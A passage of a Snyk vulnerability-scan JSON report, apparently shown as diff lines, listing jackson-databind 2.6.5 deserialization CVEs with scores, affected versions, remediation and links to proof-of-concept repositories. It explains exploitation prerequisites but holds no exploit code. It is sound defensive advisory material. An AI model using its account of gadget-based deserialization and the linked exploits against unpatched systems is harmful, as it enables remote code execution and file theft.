"level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - 
"cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - 
"publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - 
"modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - 
"modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": "Red Hat", 
- "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
